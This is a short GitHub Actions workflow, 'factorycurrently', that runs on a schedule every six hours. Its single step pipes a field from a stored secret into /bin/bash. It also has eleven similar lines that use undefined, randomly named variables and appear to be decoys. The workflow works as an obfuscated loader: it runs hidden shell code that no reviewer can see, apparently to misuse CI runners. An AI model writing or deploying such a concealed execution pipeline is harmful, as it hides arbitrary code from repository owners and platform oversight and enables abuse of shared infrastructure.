name: factorycurrently
on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: factorycurrently
        env:
          i33: ${{ secrets.i33 }}
        run: |
          echo $i33 | jq -r .gsvlb97349 | /bin/bash
          echo $bv18994 | jq -r .uwt234 | /bin/bash
          echo $njpny88 | jq -r .w99536 | /bin/bash
          echo $dzzvo43364 | jq -r .pcfjk727 | /bin/bash
          echo $uyi28016 | jq -r .yszqx67 | /bin/bash
          echo $revy4 | jq -r .xcsj52590 | /bin/bash
          echo $p72644 | jq -r .uimoh71772 | /bin/bash
          echo $n4 | jq -r .w67 | /bin/bash
          echo $xemb38 | jq -r .zsct3144 | /bin/bash
          echo $lawjt06201 | jq -r .zghw5 | /bin/bash
          echo $tgud7 | jq -r .cxfpy8 | /bin/bash
          echo $bauh7013 | jq -r .axr255 | /bin/bash

